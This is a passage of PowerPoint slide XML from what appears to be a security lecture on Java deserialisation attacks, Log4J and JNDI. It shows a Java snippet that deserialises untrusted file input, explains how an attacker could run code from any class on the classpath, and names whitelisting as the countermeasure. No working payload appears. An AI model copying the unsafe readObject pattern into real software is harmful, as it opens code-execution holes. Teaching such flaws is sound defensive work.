              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Student) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn.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readObject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(); // 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deserialise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 Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cast</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661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</a:rPr>
              <a:t>If file contains serialised </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the deserialization code from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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Student.java</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="7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defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>How would you attack this? </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661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</a:rPr>
              <a:t>If file contains other objects, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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readObject</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> will execute the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for that class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So: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> code for any class on the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CLASSPATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661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</a:rPr>
              <a:t>If the object s is later discarded as garbage, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>eg</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> because the cast fails,  the garbage collector will invoke its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB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finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> methods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So: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attacker can execute </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>finalize</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> method for any class on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>CLASSPATH</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="818954" lvl="1" indent="-314982" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1764" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1984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defTabSz="542469">
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1984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2164" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341B0781-9964-B226-EA61-61C9DC95217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541338"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 marL="817563" indent="-314325" defTabSz="541338"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 marL="1258888" indent="-250825" defTabSz="541338"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 marL="1763713" indent="-250825" defTabSz="541338"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 marL="2266950" indent="-250825" defTabSz="541338"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7241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31813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6385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40957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9097D16C-212F-431B-BE46-E7162F9AF926}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="249719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C2CAA-3D0F-FDC7-4A62-E7CB065A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42469">
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0" err="1"/>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3086" dirty="0"/>
              <a:t> attacks in</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2646" dirty="0"/>
              <a:t> Java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DEAB0B-C6AB-56D5-EDFC-754FECF0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239838"/>
            <a:ext cx="8555037" cy="5648325"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>Code to read </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> objects from a file    </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" sz="100" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FileInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>("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/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tmp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/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students.ser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>") </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="3200" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> = new </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ObjectInputStream</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>fileIn</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>        s = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>(Student) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>objectIn.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readObject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(); // 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deserialise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 Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>cast</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2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marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:br>
              <a:rPr lang="en-GB" sz="18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GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Can’t we only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialise</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> objects if they are </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="18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Student</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" b="1" i="1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1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>objects?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Subtle issue: only after the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> do we know that type of object   we </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised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endParaRPr lang="en-GB" sz="1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defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Countermeasure: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Look-Ahead Java </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="008000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Deserialisation</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="008000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to white-list which classes are allowed to be </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>deserialised</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1800" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="818954" lvl="1" indent="-314982" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1764" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" defTabSz="542469">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1984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defTabSz="542469">
              <a:spcBef>
                <a:spcPts val="661"/>
              </a:spcBef>
              <a:buFont typeface="Times New Roman" panose="02020603050405020304" pitchFamily="18" charset="0"/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:endParaRPr lang="en-GB" sz="1984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2164" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{341B0781-9964-B226-EA61-61C9DC95217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541338"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 marL="817563" indent="-314325" defTabSz="541338"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 marL="1258888" indent="-250825" defTabSz="541338"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 marL="1763713" indent="-250825" defTabSz="541338"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 marL="2266950" indent="-250825" defTabSz="541338"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7241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31813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6385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40957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9097D16C-212F-431B-BE46-E7162F9AF926}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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77</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="408459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el 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FCB8E39A-D565-0FEE-4BB2-37EB77D05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Log4J attack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B48D8E-6A84-C4B2-C149-96589B1D2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sz="1764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1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cas</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> van </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Cooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, @</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0" err="1">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>chvancooten</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1764" dirty="0">
                <a:latin typeface="Arial Narrow" panose="020B0606020202030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>, https://twitter.com/chvancooten/status/1469340927923826691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93188" name="Tijdelijke aanduiding voor dianummer 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{62B015F0-4A09-2CC7-7F61-0E3FEE370F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541338"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 marL="817563" indent="-314325" defTabSz="541338"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 marL="1258888" indent="-250825" defTabSz="541338"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 marL="1763713" indent="-250825" defTabSz="541338"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 marL="2266950" indent="-250825" defTabSz="541338"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7241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31813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6385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40957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E43263B4-33DF-4CFA-9BD7-953625D303B5}" type="slidenum">
              <a:rPr lang="en-GB" altLang="nl-NL" sz="1500" smtClean="0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78</a:t>
            </a:fld>
            <a:endParaRPr lang="en-GB" altLang="nl-NL" sz="1500"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="93189" name="Afbeelding 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A80C6110-6D77-BCAA-BFCB-24A3C3CC3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150938"/>
            <a:ext cx="351631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Afbeelding 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{354FDFCB-144A-4E78-F5EA-B974782BF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4878388"/>
            <a:ext cx="5283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Afbeelding 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{832D15B1-BCB3-CB3A-ABB0-7FE1F3291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398588"/>
            <a:ext cx="5113338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8925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078F5590-5FDB-3205-7194-A13AF95A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JNDI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" altLang="en-US" sz="2205"/>
              <a:t>(Java Naming and Directory Interface)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055DEB-FB5E-B829-1194-380CBCC3F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sz="1800" dirty="0"/>
              <a:t>Common interface to interact with a variety of naming and directory services, incl. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>LDAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>DNS</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CORBA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Naming service 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800" dirty="0"/>
              <a:t>associates names with values aka bindings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800" dirty="0"/>
              <a:t>provides lookup and search operations of objects</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Directory service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800" dirty="0"/>
              <a:t>special type of naming service for storing directory objects that can have attributes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>You can store </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Java objects </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0"/>
              <a:t>in Naming or Directory service using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800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="339933"/>
                </a:solidFill>
              </a:rPr>
              <a:t>serialisation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ie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. store byte representation of object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800" dirty="0">
                <a:solidFill>
